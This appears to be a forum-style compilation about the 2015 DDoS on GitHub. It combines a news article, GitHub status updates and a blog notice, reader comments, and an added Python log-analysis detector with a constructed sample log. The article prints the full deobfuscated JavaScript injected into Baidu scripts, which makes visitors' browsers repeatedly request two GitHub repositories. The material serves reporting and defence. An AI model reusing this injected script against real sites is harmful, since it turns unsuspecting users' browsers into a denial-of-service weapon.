The injected JavaScript used to smash anti-Great Firewall of China projects offline


Reefa


GitHub's servers are being hammered by web traffic from an army of unwitting cyber-foot-soldiers.

It appears when thousands of people visit websites that serve ads and tracking code from Baidu – China's answer to Google – from outside the Middle Kingdom, network gateways on the Chinese border silently inject a JavaScript function into those websites' pages.

This simple code instructs browsers to stealthily connect to GitHub.com every two seconds, creating "an extremely large amount of traffic," the San Francisco-based upstart said.

The JS specifically targets two GitHub-hosted projects – Greatfire and CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of China. The firewall blocks things like VPNs and censors web traffic, hiding information on the Tiananmen Square massacre and so on.

GitHub said on Friday that the bursts in traffic, effectively a string of distributed denial-of-service attacks, are causing intermittent outages.

"We're aware that GitHub.com is intermittently unavailable for some users during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.

"Restoring service for all users while deflecting attack traffic is our number one priority. We've deployed our volumetric attack defenses against an extremely large amount of traffic. Performance is stabilizing."

Hours earlier, the biz noted: "We've been under continuous DDoS attack for 24+ hours. The attack is evolving, and we're all hands on deck mitigating."

[image: github_china_ddos.png] The outage ... GitHub's status updates today

According to a security researcher at Insight Labs, HTTP requests to hm.baidu.com/h.js are being hijacked by China's border gateways, which insert some semi-obfuscated JavaScript to attack the aforementioned GitHub repositories. The injected script looks like this, once unscrambled:

    document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
    !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
    startime = (new Date).getTime();
    var count = 0;
    function unixtime() {
        var a = new Date;
        return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
    }
    // the two GitHub projects the script hammers
    url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
    NUM = url_array.length;
    function r_send2() {
        var a = unixtime() % NUM;  // pick one of the two targets by the clock
        get(url_array[a])
    }
    function get(a) {
        var b;
        $.ajax({
            url: a,
            dataType: "script",
            timeout: 1E4,
            cache: !0,
            beforeSend: function() {
                requestTime = (new Date).getTime()
            },
            complete: function() {
                responseTime = (new Date).getTime();
                b = Math.floor(responseTime - requestTime);
                // re-arm with the measured response time, for 3E5 ms (five minutes) after load
                3E5 > responseTime - startime && (r_send(b), count += 1)
            }
        })
    }
    function r_send(a) {
        setTimeout("r_send2()", a)
    }
    setTimeout("r_send2()", 2E3);  // first request fires two seconds after the page loads

The Greatfire project provides links to cloud-hosted mirrors of websites – such as the BBC and Google's Blogger – that Chinese people can use to dodge the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the New York Times.

"A certain device at the border of China's inner network and the Internet has hijacked the HTTP connections that went into China, replaced some JavaScript files from Baidu with malicious ones that would load [the GitHub pages] every two seconds," Insight Labs' Anthr@x wrote.

"In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech."

While there is no proof that the Chinese government was directly involved in the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that someone, state or otherwise, wants these projects silenced.

http://www.theregister.co.uk/2015/03/27/github_under_fire_from_weaponized_great_firewall/
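A defender-side way to spot this traffic from GitHub's position, as an added example that is not from the article, GitHub or Insight Labs: it parses combined-format access logs and flags clients that keep hitting the two repository paths at a fast, regular cadence while the Referer points at an unrelated site (the page that received the injected script). The log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

TARGET_PATHS = ("/greatfire/", "/cn-nytimes/")  # the two repos named in the script
# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format log line; None for anything else."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), ts=datetime.strptime(m["ts"], TS_FMT)) if m else None

def flag_weaponised_clients(lines, min_hits=3, max_gap=3.0):
    """Return {ip: hit_count} for clients that keep fetching the target paths at
    a fast, regular cadence while the Referer points at some unrelated site (the
    page that received the injected script); humans do not browse like that."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(TARGET_PATHS):
            continue
        if "github.com" in rec["referer"]:
            continue  # ordinary navigation inside GitHub
        hits[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in hits.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if median(gaps) <= max_gap:  # script fires at 2 s, then re-arms at measured RTT
            flagged[ip] = len(stamps)
    return flagged

def _line(ip, sec, path, referer):  # one constructed log record
    return (f'{ip} - - [27/Mar/2015:15:49:{sec:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 512 "{referer}" "Mozilla/5.0"')
# Constructed sample: 203.0.113.7 alternates between the two targets every 2 s;
# 198.51.100.9 browses GitHub normally; 192.0.2.5 revisits one repo every 20 s.
SAMPLE_LOG = (
    [_line("203.0.113.7", 2 * i, TARGET_PATHS[i % 2], "http://example.invalid/news") for i in range(6)]
    + [_line("198.51.100.9", 4, "/greatfire/", "https://github.com/greatfire")]
    + [_line("192.0.2.5", 20 * i, "/cn-nytimes/", "http://example.invalid/blog") for i in range(3)]
    + ["not a log record"])
```

Running flag_weaponised_clients(SAMPLE_LOG) returns only the weaponised client with its six hits; the thresholds are starting points to tune against real traffic volumes.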

https://status.github.com/

2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match.

Cheers for the update on the story mate. ;)



Large Scale DDoS Attack on github.com

jnewland

We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com's history. The attack began around 2AM UTC on Thursday, March 26, and involves a wide combination of attack vectors. These include every vector we've seen in previous attacks as well as some sophisticated new techniques that use the web browsers of unsuspecting, uninvolved people to flood github.com with high levels of traffic. Based on reports we've received, we believe the intent of this attack is to convince us to remove a specific class of content.

We are completely focused on mitigating this attack. Our top priority is making sure github.com is available to all our users while deflecting malicious traffic. Please watch our status site or follow @githubstatus on Twitter for real-time updates.



10:53 UTC Services are stable as we continue to mitigate against a large scale DDoS attack.


19:25 UTC We've adjusted our mitigation tactics and are observing improved TCP performance for the majority of non-attack traffic.


The code is actually very simple, and a JavaScript 101 person could write something of similar function.

Just a loop via setTimeout to suck down the URL via a web request.

The really alarming thing here is, if you pull any code at all from China, you are vulnerable to their government tampering with it. I'm sure most nations have this capability, but this is a confirmed fact that the Chinese government uses us as DDoS pawns.

Good thing I use stuff like uBlock, no crappy ad injection code from any country in my browser.



Today
6:46 UTC The DDoS attack has evolved and we are working to mitigate.
0:38 UTC All systems reporting at 100%. Attack traffic continues, so we remain on high alert.